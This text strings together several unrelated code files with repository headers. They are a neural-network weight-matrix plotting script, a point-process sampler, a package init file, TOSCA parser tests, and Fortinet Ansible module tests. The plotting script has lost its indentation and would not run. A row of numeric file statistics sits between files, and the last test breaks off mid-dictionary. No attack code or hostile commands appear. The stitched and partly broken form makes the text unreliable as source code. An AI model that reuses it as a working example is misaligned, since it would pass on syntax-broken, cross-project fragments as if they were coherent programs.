fname = './plots/matrix_normal.pdf'
plt.savefig(fname, format='pdf', dpi=100, bbox_inches='tight', frameon=True, transparent=False)
plt.show()
if overlaped_plot:
# Patterns parameters
hypercolumns = 4
minicolumns = 15
n_patterns = 10
dt = 0.001
# Manager properties
dt = 0.001
T_recalling = 5.0
values_to_save = ['o']
# Protocol
training_time = 0.3
inter_sequence_interval = 1.0
inter_pulse_interval = 0.0
epochs = 3
tau_p = 100.0
# Build the network
nn = BCPNNFast(hypercolumns, minicolumns, sigma=0, tau_p=tau_p)
# Build the manager
manager = NetworkManager(nn=nn, dt=dt, values_to_save=values_to_save)
# Build chain protocol
chain_protocol = Protocol()
sequences = [[0, 1, 2, 3, 4, 5, 6], [7, 8, 2, 3, 4, 9, 10]]
chain_protocol.cross_protocol(sequences, training_time=training_time,
inter_sequence_interval=inter_sequence_interval, epochs=epochs)
print(sequences)
# Train
manager.run_network_protocol(protocol=chain_protocol, verbose=True)
# Now plotting
w = nn.w
fig = plt.figure(figsize=(16, 12))
ax = fig.add_subplot(111)
w = w[:nn.minicolumns, :nn.minicolumns]
aux_max = np.max(np.abs(w))
cmap = 'coolwarm'
im = ax.imshow(w, cmap=cmap, interpolation='None', vmin=-aux_max, vmax=aux_max)
divider = make_axes_locatable(ax)
cax = divider.append_axes('right', size='5%', pad=0.05)
ax.get_figure().colorbar(im, ax=ax, cax=cax)
# Add text
fontsize = 18
for sequence in sequences:
print(sequence)
for i in range(len(sequence) - 1):
coordinate_from = sequence[i]
coordinate_to = sequence[i + 1]
set_text(ax, coordinate_from=coordinate_from, coordinate_to=coordinate_to, fontsize=fontsize)
# Editing
ax.grid()
ax.set_title('Sequences with overlap')
ax.set_xlabel('Input')
ax.set_ylabel('Output')
fname = './plots/matrix_overlap.pdf'
plt.savefig(fname, format='pdf', dpi=100, bbox_inches='tight', frameon=True, transparent=False)
plt.show()
if overloaded_pot:
# Patterns parameters
hypercolumns = 4
minicolumns = 23
n_patterns = 10
dt = 0.001
# Manager properties
dt = 0.001
T_recalling = 5.0
values_to_save = ['o']
# Protocol
training_time = 0.3
inter_sequence_interval = 3.0
inter_pulse_interval = 0.0
epochs = 3
tau_p = 100.0
# Build the network
nn = BCPNNFast(hypercolumns, minicolumns, sigma=0, tau_p=tau_p)
# Build the manager
manager = NetworkManager(nn=nn, dt=dt, values_to_save=values_to_save)
# Build chain protocol
chain_protocol = Protocol()
sequences = [[1, 2, 0, 3, 4], [5, 6, 0, 7, 8], [9, 10, 0, 11, 12], [13, 14, 0, 15, 16]]
chain_protocol.cross_protocol(sequences, training_time=training_time,
inter_sequence_interval=inter_sequence_interval, epochs=epochs)
print(sequences)
# Train
manager.run_network_protocol(protocol=chain_protocol, verbose=True)
# Now plotting
w = nn.w
fig = plt.figure(figsize=(16, 12))
ax = fig.add_subplot(111)
w = w[:nn.minicolumns, :nn.minicolumns]
aux_max = np.max(np.abs(w))
cmap = 'coolwarm'
im = ax.imshow(w, cmap=cmap, interpolation='None', vmin=-aux_max, vmax=aux_max)
divider = make_axes_locatable(ax)
cax = divider.append_axes('right', size='5%', pad=0.05)
ax.get_figure().colorbar(im, ax=ax, cax=cax)
# Add text
fontsize = 8
for sequence in sequences:
print(sequence)
for i in range(len(sequence) - 1):
coordinate_from = sequence[i]
coordinate_to = sequence[i + 1]
set_text(ax, coordinate_from=coordinate_from, coordinate_to=coordinate_to, fontsize=fontsize)
# Editing
ax.grid()
ax.set_title('High overload scenario')
ax.set_xlabel('Input')
ax.set_ylabel('Output')
fname = './plots/matrix_overload.pdf'
plt.savefig(fname, format='pdf', dpi=100, bbox_inches='tight', frameon=True, transparent=False)
plt.show()
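The weight matrices visualised above encode trained sequences as asymmetric connectivity: the annotated cells sit at (coordinate_to, coordinate_from) for each consecutive pair in a sequence. A toy, framework-free construction of that transition structure (binary weights only, purely illustrative; the trained BCPNN weights are of course continuous):

```python
def transition_matrix(sequences, n_units):
    """w[post][pre] = 1 whenever some sequence steps pre -> post."""
    w = [[0] * n_units for _ in range(n_units)]
    for seq in sequences:
        for pre, post in zip(seq[:-1], seq[1:]):
            w[post][pre] = 1
    return w
```

With the overlapping sequences from the script, the shared segment 2 -> 3 -> 4 produces cells that both branches feed into, which is exactly the structure the "Sequences with overlap" plot highlights.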
#!/usr/bin/env python
# File: ppgen.py (repo: xiaoshuai09/pp, license: MIT)
import abc
import scipy.stats
import numpy as np
class Intensity(abc.ABC):
    """Abstract base class for intensity (rate) functions."""


class IntensityHomogenuosPoisson(Intensity):

    def __init__(self, lam):
        self.lam = lam

    def get_value(self, t=None, past_ts=None):
        return self.lam

    def get_upper_bound(self, past_ts=None, t=None, to_t=None):
        return self.lam
class IntensityGaussianMixture(Intensity):

    def __init__(self, k=2, centers=[2, 4], stds=[1, 1], coefs=[1, 1]):
        self.k = k
        self.centers = centers
        self.stds = stds
        self.coefs = coefs

    def get_value(self, t=None, past_ts=None):
        return self._get_gaussianmixture_value(t)

    def get_upper_bound(self, past_ts=None, t=None, to_t=None):
        max_val = sum([self._get_gaussianmixture_value(center) for center in self.centers])
        return max_val

    def _get_gaussianmixture_value(self, t):
        inten = 0
        for i in range(self.k):
            inten += self.coefs[i] * scipy.stats.norm.pdf(t, self.centers[i], self.stds[i])
        return inten

    def get_integral(self, t, past_ts=None):
        return sum([coef * (scipy.stats.norm.cdf(t, center, std) -
                            scipy.stats.norm.cdf(0, center, std))
                    for coef, center, std in zip(self.coefs, self.centers, self.stds)])
class IntensityHawkes(Intensity):

    def __init__(self, mu=1, alpha=0.3, beta=1):
        self.mu = mu
        self.alpha = alpha
        self.beta = beta

    def get_value(self, t=None, past_ts=None):
        inten = self.mu + np.sum(self.alpha * self.beta * np.exp(-self.beta * np.subtract(t, past_ts)))
        return inten

    def get_upper_bound(self, past_ts=None, t=None, to_t=None):
        max_val = self.mu + np.sum(self.alpha * self.beta * np.exp(-self.beta * np.subtract(t, past_ts)))
        return max_val

    def get_integral(self, t, past_ts):
        return self.mu * t + \
            self.alpha * np.sum(1 - np.exp(-self.beta * (t - np.array(past_ts))))
class IntensityPoly(Intensity):
    """Piecewise-linear intensity with breakpoints `segs`, initial value `b`
    and per-segment slopes `A`."""

    def __init__(self, segs=[0, 1, 2, 3], b=0, A=[1, 2, -3]):
        self.segs = segs
        self.b = b
        self.A = A
        if len(A) != len(segs) - 1:
            raise Exception("The number of slopes in A must be len(segs) - 1.")

    def get_value(self, t=None, past_ts=None):
        return self._get_poly_value(t)

    def get_upper_bound(self, past_ts=None, t=None, to_t=None):
        max_val = 0
        segs_within_range = [s for s in self.segs if s > t and s < to_t]
        if len(segs_within_range) > 0:
            # Evaluate at each breakpoint inside (t, to_t), not at t itself.
            max_val = max([self._get_poly_value(s) for s in segs_within_range])
        max_val = max([self._get_poly_value(t), self._get_poly_value(to_t), max_val])
        return max_val

    def _get_poly_value(self, t):
        if t > self.segs[-1]:
            raise Exception("t is out of range.")
        segs_before_t = [s for s in self.segs if s < t]
        b = self.b
        for seg_ind in range(len(segs_before_t) - 1):
            b = b + self.A[seg_ind] * (segs_before_t[seg_ind + 1] - segs_before_t[seg_ind])
        if len(segs_before_t) >= 1:
            value = b + self.A[len(segs_before_t) - 1] * (t - segs_before_t[len(segs_before_t) - 1])
        else:
            value = b
        return value

    def get_integral(self, t, past_ts=None):
        if t > self.segs[-1]:
            raise Exception("t is out of range.")
        segs_before_t = [s for s in self.segs if s < t]
        # Starting intercepts (bs) for each segment (size = len(segs_before_t) + 1).
        bs = [self.b]
        for seg_ind in range(len(segs_before_t) - 1):
            b = bs[seg_ind] + self.A[seg_ind] * \
                (segs_before_t[seg_ind + 1] - segs_before_t[seg_ind])
            bs.append(b)
        bs.append(self._get_poly_value(t))  # last intercept
        # Length of each segment (size = len(segs_before_t)).
        lens = []
        for seg_ind in range(len(segs_before_t) - 1):
            lens.append(segs_before_t[seg_ind + 1] - segs_before_t[seg_ind])
        last_seg = segs_before_t[-1] if len(segs_before_t) > 0 else 0
        lens.append(t - last_seg)  # length of the last (partial) segment
        # Trapezoid area for each segment.
        integrals = [(width1 + width2) * height / 2.
                     for width1, width2, height in zip(bs[:-1], bs[1:], lens)]
        return sum(integrals)
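`get_integral` above accumulates trapezoid areas segment by segment; the same piecewise-linear integral can be sketched standalone and checked against a hand computation (the function name here is illustrative, not part of the module):

```python
def piecewise_linear_integral(segs, b, A, t):
    # Integrate a piecewise-linear function with breakpoints `segs`,
    # initial value `b`, and per-segment slopes `A`, from 0 to t.
    total, value = 0.0, float(b)
    for left, right, slope in zip(segs[:-1], segs[1:], A):
        hi = min(t, right)
        if hi <= left:
            break
        width = hi - left
        end_value = value + slope * width
        total += (value + end_value) * width / 2.0  # trapezoid area
        value = value + slope * (right - left)
    return total

# Slope +1 on [0, 1], slope -1 on [1, 2]: the integral over [0, 2] is 1.0.
area = piecewise_linear_integral([0, 1, 2], b=0, A=[1, -1], t=2.0)
```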
#
# class IntensitySelfCorrecting(Intensity):
#
# def __init__(self, mu=1, alpha=0.3):
# self.mu = mu
# self.alpha = alpha
#
# def get_value(self, t, past_ts):
# return np.exp(self.mu * t - self.alpha * len(past_ts))
#
# def get_upper_bound(self, past_ts=None, t=None, to_t):
# # TODO: Improve this upper bound
# return np.exp(self.mu * to_t)
#
# def get_integral(self, t, past_ts):
# for past_t in past_ts:
# past_t
# return
class IntensityHawkesPlusPoly(IntensityHawkes, IntensityPoly):

    def __init__(self, mu=1, alpha=0.3, beta=1,
                 segs=[0, 1, 2, 3], b=0, A=[1, 2, -3]):
        IntensityPoly.__init__(self, segs=segs, b=b, A=A)
        IntensityHawkes.__init__(self, mu=mu, alpha=alpha, beta=beta)

    def get_value(self, t=None, past_ts=None):
        return IntensityHawkes.get_value(self, t=t, past_ts=past_ts) + \
            IntensityPoly.get_value(self, t=t)

    def get_upper_bound(self, past_ts=None, t=None, to_t=None):
        return IntensityPoly.get_upper_bound(self, t=t, to_t=to_t) + \
            IntensityHawkes.get_upper_bound(self, past_ts=past_ts, t=t)

    def get_integral(self, t, past_ts):
        return IntensityPoly.get_integral(self, t=t) + \
            IntensityHawkes.get_integral(self, t=t, past_ts=past_ts)
class IntensityHawkesPlusGaussianMixture(IntensityHawkes, IntensityGaussianMixture):

    def __init__(self, mu=1, alpha=0.3, beta=1,
                 k=2, centers=[2, 4], stds=[1, 1], coefs=[1, 1]):
        IntensityHawkes.__init__(self, mu=mu, alpha=alpha, beta=beta)
        IntensityGaussianMixture.__init__(self, k=k, centers=centers, stds=stds, coefs=coefs)

    def get_value(self, t=None, past_ts=None):
        return IntensityHawkes.get_value(self, t=t, past_ts=past_ts) + \
            IntensityGaussianMixture.get_value(self, t=t)

    def get_upper_bound(self, past_ts=None, t=None, to_t=None):
        return IntensityGaussianMixture.get_upper_bound(self, t=t, to_t=to_t) + \
            IntensityHawkes.get_upper_bound(self, past_ts=past_ts, t=t)

    def get_integral(self, t, past_ts):
        return IntensityGaussianMixture.get_integral(self, t=t) + \
            IntensityHawkes.get_integral(self, t=t, past_ts=past_ts)
def generate_sample(intensity, T, n):
    """Draw n event sequences on [0, T] from `intensity` by Ogata thinning."""
    seqs = []
    i = 0
    while True:
        past_ts = []
        cur_t = 0
        while True:
            intens1 = intensity.get_upper_bound(past_ts=past_ts, t=cur_t, to_t=T)
            intens1 = intens1 if intens1 != 0 else 1e-4  # avoid division by zero
            t_delta = np.random.exponential(1.0 / float(intens1))
            next_t = cur_t + t_delta
            # print("cur_t:%f, next_t:%f, delta_t:%f" % (cur_t, next_t, t_delta))
            if next_t > T:
                break
            intens2 = intensity.get_value(t=next_t, past_ts=past_ts)
            u = np.random.uniform()
            if float(intens2) / float(intens1) >= u:
                past_ts.append(next_t)
            cur_t = next_t
        if len(past_ts) > 1:
            seqs.append(past_ts)
            i += 1
        if i == n:
            break
    return seqs
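`generate_sample` implements Ogata-style thinning: propose candidate times from an upper-bounding homogeneous Poisson process, then accept each with probability intensity/bound. A self-contained sketch of the same scheme (names here are illustrative, not imported from this module):

```python
import numpy as np

def thinning_sample(get_value, get_upper_bound, T, seed=0):
    """Ogata-style thinning on [0, T]: propose exponential gaps at the
    bounding rate, keep a proposal with probability value / bound."""
    rng = np.random.default_rng(seed)
    past_ts, cur_t = [], 0.0
    while True:
        lam_bar = max(get_upper_bound(), 1e-4)  # guard against a zero rate
        cur_t += rng.exponential(1.0 / lam_bar)
        if cur_t > T:
            break
        if get_value(cur_t) / lam_bar >= rng.uniform():
            past_ts.append(cur_t)
    return past_ts

# Constant-rate process: intensity equals the bound, so every proposal is kept.
seq = thinning_sample(lambda t: 2.0, lambda: 2.0, T=50.0)
```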
if __name__ == "__main__":
    n = 2
    T = 10.
    intensity_hawkes = IntensityHawkes(mu=1, alpha=0.3, beta=1)
    intensity_poly = IntensityPoly(segs=[0, T/4., T*2./4., T*3./4., T],
                                   b=0, A=[2, -2, 2, -2])
    intensity_hawkes_poly = IntensityHawkesPlusPoly(mu=1, alpha=0.3, beta=1,
                                                    segs=[0, T/4, T*2/4, T*3/4, T],
                                                    b=1, A=[1, -1, 1, -1])
    intensity_hawkes_gaussianmixture = IntensityHawkesPlusGaussianMixture(mu=1, alpha=0.3, beta=1,
                                                                          k=2, centers=[T/4, T*3/4], stds=[1, 1], coefs=[1, 1])
    print(generate_sample(intensity_poly, T, n))
# batchglm/api/models/tf2/__init__.py (repo: le-ander/batchglm, license: BSD-3-Clause)
from . import glm_beta
from . import glm_nb
from . import glm_norm
| 16.75 | 22 | 0.776119 | 12 | 67 | 4.083333 | 0.5 | 0.612245 | 0.795918 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.179104 | 67 | 3 | 23 | 22.333333 | 0.890909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
# tests/extensions/aria_extension_tosca/simple_v1_0/templates/test_substitution_mappings.py (repo: tnadeau/incubator-ariatosca, license: Apache-2.0)
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from .. import data
@pytest.mark.parametrize('value', data.NOT_A_DICT)
def test_substitution_mappings_syntax_type(parser, value):
    parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
topology_template:
  substitution_mappings: {{ value }}
""", dict(value=value)).assert_failure()
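`parse_literal` appears to render the `{{ value }}` placeholders from the supplied dict before parsing the YAML; a minimal standalone sketch of that substitution step (not the project's actual implementation):

```python
import re

def render(template, variables):
    # Substitute {{ name }} placeholders with values from `variables`,
    # the way each parametrized test specializes its YAML template.
    return re.sub(r'\{\{\s*(\w+)\s*\}\}',
                  lambda m: str(variables[m.group(1)]), template)

rendered = render("substitution_mappings: {{ value }}", {'value': 123})
```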
def test_substitution_mappings_syntax_unsupported(parser):
    parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
node_types:
  MyType: {}
topology_template:
  substitution_mappings:
    node_type: MyType
    unsupported: {}
""").assert_failure()


def test_substitution_mappings_syntax_empty(parser):
    parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
topology_template:
  substitution_mappings: {} # "node_type" is required
""").assert_failure()
# Node type
def test_substitution_mappings_node_type_syntax_type(parser):
    # {{ value }} must be rendered from the dict below; a non-string
    # node_type should fail validation.
    parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
topology_template:
  description: a description
  substitution_mappings:
    node_type: {{ value }}
""", dict(value=123)).assert_failure()
# Requirements section
@pytest.mark.parametrize('value', data.NOT_A_DICT)
def test_substitution_mappings_requirements_section_syntax_type(parser, value):
    parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
node_types:
  MyType: {}
topology_template:
  substitution_mappings:
    node_type: MyType
    requirements: {{ value }}
""", dict(value=value)).assert_failure()


def test_substitution_mappings_requirements_section_syntax_empty(parser):
    parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
node_types:
  MyType: {}
topology_template:
  substitution_mappings:
    node_type: MyType
    requirements: {}
""").assert_success()
# Requirement
@pytest.mark.parametrize('value', data.NOT_A_LIST_OF_TWO)
def test_substitution_mappings_requirement_syntax_type(parser, value):
    parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
  MyType: {}
node_types:
  MyType:
    requirements:
      - my_requirement:
          capability: MyType
topology_template:
  substitution_mappings:
    node_type: MyType
    requirements:
      my_requirement: {{ value }}
""", dict(value=value)).assert_failure()


def test_substitution_mappings_requirement_same(parser):
    parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
  MyType: {}
node_types:
  MyType:
    requirements:
      - my_requirement:
          capability: MyType
  MyInternalType:
    requirements:
      - my_internal_requirement:
          capability: MyType
topology_template:
  node_templates:
    my_template:
      type: MyInternalType
  substitution_mappings:
    node_type: MyType
    requirements:
      my_requirement: [ my_template, my_internal_requirement ]
""").assert_success()


def test_substitution_mappings_requirement_derived(parser):
    parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
  MyType1: {}
  MyType2:
    derived_from: MyType1
node_types:
  MyType:
    requirements:
      - my_requirement:
          capability: MyType1
  MyInternalType:
    requirements:
      - my_internal_requirement:
          capability: MyType2
topology_template:
  node_templates:
    my_template:
      type: MyInternalType
  substitution_mappings:
    node_type: MyType
    requirements:
      my_requirement: [ my_template, my_internal_requirement ]
""").assert_success()


def test_substitution_mappings_requirement_bad(parser):
    parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
  MyType1: {}
  MyType2: {}
node_types:
  MyType:
    requirements:
      - my_requirement:
          capability: MyType1
  MyInternalType:
    requirements:
      - my_internal_requirement:
          capability: MyType2
topology_template:
  node_templates:
    my_template:
      type: MyInternalType
  substitution_mappings:
    node_type: MyType
    requirements:
      my_requirement: [ my_template, my_internal_requirement ]
""").assert_failure()


def test_substitution_mappings_requirement_unknown(parser):
    parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
  MyType: {}
node_types:
  MyType:
    requirements:
      - my_requirement:
          capability: MyType
  MyInternalType:
    requirements:
      - my_internal_requirement:
          capability: MyType
topology_template:
  node_templates:
    my_template:
      type: MyInternalType
  substitution_mappings:
    node_type: MyType
    requirements:
      unknown: [ my_template, my_internal_requirement ]
""").assert_failure()


def test_substitution_mappings_requirement_unknown_mapped_template(parser):
    parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
  MyType: {}
node_types:
  MyType:
    requirements:
      - my_requirement:
          capability: MyType
  MyInternalType:
    requirements:
      - my_internal_requirement:
          capability: MyType
topology_template:
  node_templates:
    my_template:
      type: MyInternalType
  substitution_mappings:
    node_type: MyType
    requirements:
      my_requirement: [ unknown, my_internal_requirement ]
""").assert_failure()


def test_substitution_mappings_requirement_unknown_mapped_requirement(parser):
    parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
  MyType: {}
node_types:
  MyType:
    requirements:
      - my_requirement:
          capability: MyType
  MyInternalType:
    requirements:
      - my_internal_requirement:
          capability: MyType
topology_template:
  node_templates:
    my_template:
      type: MyInternalType
  substitution_mappings:
    node_type: MyType
    requirements:
      my_requirement: [ my_template, unknown ]
""").assert_failure()
# Capabilities section
@pytest.mark.parametrize('value', data.NOT_A_DICT)
def test_substitution_mappings_capabilities_section_syntax_type(parser, value):
    parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
node_types:
  MyType: {}
topology_template:
  substitution_mappings:
    node_type: MyType
    capabilities: {{ value }}
""", dict(value=value)).assert_failure()


def test_substitution_mappings_capabilities_section_syntax_empty(parser):
    parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
node_types:
  MyType: {}
topology_template:
  substitution_mappings:
    node_type: MyType
    capabilities: {}
""").assert_success()
# Capability
@pytest.mark.parametrize('value', data.NOT_A_LIST_OF_TWO)
def test_substitution_mappings_capability_syntax_type(parser, value):
    parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
  MyType: {}
node_types:
  MyType:
    capabilities:
      my_capability: MyType
topology_template:
  substitution_mappings:
    node_type: MyType
    capabilities:
      my_capability: {{ value }}
""", dict(value=value)).assert_failure()


def test_substitution_mappings_capability_same(parser):
    parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
  MyType: {}
node_types:
  MyType:
    capabilities:
      my_capability: MyType
  MyInternalType:
    capabilities:
      my_internal_capability: MyType
topology_template:
  node_templates:
    my_template:
      type: MyInternalType
  substitution_mappings:
    node_type: MyType
    capabilities:
      my_capability: [ my_template, my_internal_capability ]
""").assert_success()


def test_substitution_mappings_capability_derived(parser):
    parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
  MyType1: {}
  MyType2:
    derived_from: MyType1
node_types:
  MyType:
    capabilities:
      my_capability: MyType1
  MyInternalType:
    capabilities:
      my_internal_capability: MyType2
topology_template:
  node_templates:
    my_template:
      type: MyInternalType
  substitution_mappings:
    node_type: MyType
    capabilities:
      my_capability: [ my_template, my_internal_capability ]
""").assert_success()


def test_substitution_mappings_capability_bad(parser):
    parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
  MyType1: {}
  MyType2: {}
node_types:
  MyType:
    capabilities:
      my_capability: MyType1
  MyInternalType:
    capabilities:
      my_internal_capability: MyType2
topology_template:
  node_templates:
    my_template:
      type: MyInternalType
  substitution_mappings:
    node_type: MyType
    capabilities:
      my_capability: [ my_template, my_internal_capability ]
""").assert_failure()


def test_substitution_mappings_capability_unknown(parser):
    parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
  MyType: {}
node_types:
  MyType:
    capabilities:
      my_capability: MyType
  MyInternalType:
    capabilities:
      my_internal_capability: MyType
topology_template:
  node_templates:
    my_template:
      type: MyInternalType
  substitution_mappings:
    node_type: MyType
    capabilities:
      unknown: [ my_template, my_internal_capability ]
""").assert_failure()


def test_substitution_mappings_capability_unknown_mapped_template(parser):
    parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
  MyType: {}
node_types:
  MyType:
    capabilities:
      my_capability: MyType
  MyInternalType:
    capabilities:
      my_internal_capability: MyType
topology_template:
  node_templates:
    my_template:
      type: MyInternalType
  substitution_mappings:
    node_type: MyType
    capabilities:
      my_capability: [ unknown, my_internal_capability ]
""").assert_failure()


def test_substitution_mappings_capability_unknown_mapped_capability(parser):
    parser.parse_literal("""
tosca_definitions_version: tosca_simple_yaml_1_0
capability_types:
  MyType: {}
node_types:
  MyType:
    capabilities:
      my_capability: MyType
  MyInternalType:
    capabilities:
      my_internal_capability: MyType
topology_template:
  node_templates:
    my_template:
      type: MyInternalType
  substitution_mappings:
    node_type: MyType
    capabilities:
      my_capability: [ my_template, unknown ]
""").assert_failure()
# v6.0.5/wireless_controller/test_fortios_wireless_controller_timers.py (repo: fortinet-solutions-cse/ansible_fgt_modules, license: Apache-2.0)
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type

import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler

try:
    from ansible.modules.network.fortios import fortios_wireless_controller_timers
except ImportError:
    pytest.skip("Could not load required modules for testing", allow_module_level=True)


@pytest.fixture(autouse=True)
def connection_mock(mocker):
    connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_wireless_controller_timers.Connection')
    return connection_class_mock


fos_instance = FortiOSHandler(connection_mock)
def test_wireless_controller_timers_creation(mocker):
    schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')

    set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
    set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)

    input_data = {
        'username': 'admin',
        'state': 'present',
        'wireless_controller_timers': {
            'ble_scan_report_intv': '3',
            'client_idle_timeout': '4',
            'darrp_day': 'sunday',
            'darrp_optimize': '6',
            'discovery_interval': '7',
            'echo_interval': '8',
            'fake_ap_log': '9',
            'ipsec_intf_cleanup': '10',
            'radio_stats_interval': '11',
            'rogue_ap_log': '12',
            'sta_capability_interval': '13',
            'sta_locate_timer': '14',
            'sta_stats_interval': '15',
            'vap_stats_interval': '16'
        },
        'vdom': 'root'}

    is_error, changed, response = fortios_wireless_controller_timers.fortios_wireless_controller(input_data, fos_instance)

    expected_data = {
        'ble-scan-report-intv': '3',
        'client-idle-timeout': '4',
        'darrp-day': 'sunday',
        'darrp-optimize': '6',
        'discovery-interval': '7',
        'echo-interval': '8',
        'fake-ap-log': '9',
        'ipsec-intf-cleanup': '10',
        'radio-stats-interval': '11',
        'rogue-ap-log': '12',
        'sta-capability-interval': '13',
        'sta-locate-timer': '14',
        'sta-stats-interval': '15',
        'vap-stats-interval': '16'
    }

    set_method_mock.assert_called_with('wireless-controller', 'timers', data=expected_data, vdom='root')
    schema_method_mock.assert_not_called()
    assert not is_error
    assert changed
    assert response['status'] == 'success'
    assert response['http_status'] == 200
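The `expected_data` dict is simply `input_data`'s timer keys with underscores swapped for hyphens, which the fortios module utilities apply recursively before calling the API; a minimal standalone sketch of that translation (the helper mirrors, but is not imported from, the real module):

```python
def underscore_to_hyphen(data):
    # Recursively rewrite dict keys from snake_case to hyphen-case,
    # matching the input_data -> expected_data mapping in the tests above.
    if isinstance(data, list):
        return [underscore_to_hyphen(elem) for elem in data]
    if isinstance(data, dict):
        return {k.replace('_', '-'): underscore_to_hyphen(v) for k, v in data.items()}
    return data

converted = underscore_to_hyphen({'ble_scan_report_intv': '3', 'darrp_day': 'sunday'})
```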
def test_wireless_controller_timers_creation_fails(mocker):
    schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')

    set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
    set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)

    input_data = {
        'username': 'admin',
        'state': 'present',
        'wireless_controller_timers': {
            'ble_scan_report_intv': '3',
            'client_idle_timeout': '4',
            'darrp_day': 'sunday',
            'darrp_optimize': '6',
            'discovery_interval': '7',
            'echo_interval': '8',
            'fake_ap_log': '9',
            'ipsec_intf_cleanup': '10',
            'radio_stats_interval': '11',
            'rogue_ap_log': '12',
            'sta_capability_interval': '13',
            'sta_locate_timer': '14',
            'sta_stats_interval': '15',
            'vap_stats_interval': '16'
        },
        'vdom': 'root'}

    is_error, changed, response = fortios_wireless_controller_timers.fortios_wireless_controller(input_data, fos_instance)

    expected_data = {
        'ble-scan-report-intv': '3',
        'client-idle-timeout': '4',
        'darrp-day': 'sunday',
        'darrp-optimize': '6',
        'discovery-interval': '7',
        'echo-interval': '8',
        'fake-ap-log': '9',
        'ipsec-intf-cleanup': '10',
        'radio-stats-interval': '11',
        'rogue-ap-log': '12',
        'sta-capability-interval': '13',
        'sta-locate-timer': '14',
        'sta-stats-interval': '15',
        'vap-stats-interval': '16'
    }

    set_method_mock.assert_called_with('wireless-controller', 'timers', data=expected_data, vdom='root')
    schema_method_mock.assert_not_called()
    assert is_error
    assert not changed
    assert response['status'] == 'error'
    assert response['http_status'] == 500
def test_wireless_controller_timers_idempotent(mocker):
    schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')

    set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
    set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)

    input_data = {
        'username': 'admin',
        'state': 'present',
        'wireless_controller_timers': {
            'ble_scan_report_intv': '3',
            'client_idle_timeout': '4',
            'darrp_day': 'sunday',
            'darrp_optimize': '6',
            'discovery_interval': '7',
            'echo_interval': '8',
            'fake_ap_log': '9',
            'ipsec_intf_cleanup': '10',
            'radio_stats_interval': '11',
            'rogue_ap_log': '12',
            'sta_capability_interval': '13',
            'sta_locate_timer': '14',
            'sta_stats_interval': '15',
            'vap_stats_interval': '16'
        },
        'vdom': 'root'}

    is_error, changed, response = fortios_wireless_controller_timers.fortios_wireless_controller(input_data, fos_instance)

    expected_data = {
        'ble-scan-report-intv': '3',
        'client-idle-timeout': '4',
        'darrp-day': 'sunday',
        'darrp-optimize': '6',
        'discovery-interval': '7',
